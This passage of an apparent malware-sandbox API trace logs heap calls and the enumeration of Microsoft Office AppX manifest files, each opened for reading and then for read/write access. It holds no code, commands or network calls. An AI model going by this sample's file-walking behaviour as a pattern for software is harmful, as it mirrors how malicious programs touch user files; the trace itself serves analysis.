hHeap=0x20000) returned 1 [0098.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d178 | out: hHeap=0x20000) returned 1 [0098.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0098.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0098.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0098.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0098.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0098.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89640 [0098.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0098.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88d30 [0098.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89640 | out: hHeap=0x20000) returned 1 [0098.614] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.614] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.614] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.614] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88d30 | out: hHeap=0x20000) returned 1 [0098.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.614] AreFileApisANSI () returned 1 [0098.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0098.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.614] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.614] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0098.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0098.614] AreFileApisANSI () returned 1 [0098.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 105 [0098.614] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.615] GetFileType (hFile=0x418) returned 0x1 [0098.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.615] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.615] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.616] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.616] CloseHandle (hObject=0x418) returned 1 [0098.616] AreFileApisANSI () returned 1 [0098.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 105 [0098.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.616] GetFileType (hFile=0x418) returned 0x1 [0098.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.616] CloseHandle (hObject=0x418) returned 1 [0098.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0098.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0098.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0098.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0098.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0098.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0098.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0098.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0098.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0098.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0098.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0098.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0098.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0098.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0098.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.618] AreFileApisANSI () returned 1 [0098.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 105 [0098.618] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x83485006, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x83485006, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x841a1e52, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x79381)) returned 1 [0098.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0098.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.618] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x834d1316, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x834d1316, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83ecd099, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", cAlternateFileName="APCEE5~1.XML")) returned 1 [0098.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0098.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68e00 [0098.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0098.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0098.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e00 | out: hHeap=0x20000) returned 1 [0098.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8d0d0 [0098.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0098.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0098.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0098.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0098.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0098.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0098.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0098.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0098.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89388 [0098.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88c48 [0098.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89388 | out: hHeap=0x20000) returned 1 [0098.619] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.619] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.619] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.619] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88c48 | out: hHeap=0x20000) returned 1 [0098.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.619] AreFileApisANSI () returned 1 [0098.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0098.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.619] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.619] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0098.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0098.619] AreFileApisANSI () returned 1 [0098.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 105 [0098.620] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.620] GetFileType (hFile=0x418) returned 0x1 [0098.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.621] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.621] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.621] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.621] CloseHandle (hObject=0x418) returned 1 [0098.621] AreFileApisANSI () returned 1 [0098.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 105 [0098.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.621] GetFileType (hFile=0x418) returned 0x1 [0098.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.622] CloseHandle (hObject=0x418) returned 1 [0098.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0098.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0098.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0098.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0098.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0098.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0098.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0098.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0098.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0098.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0098.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0098.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0098.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.623] HeapFree (in: 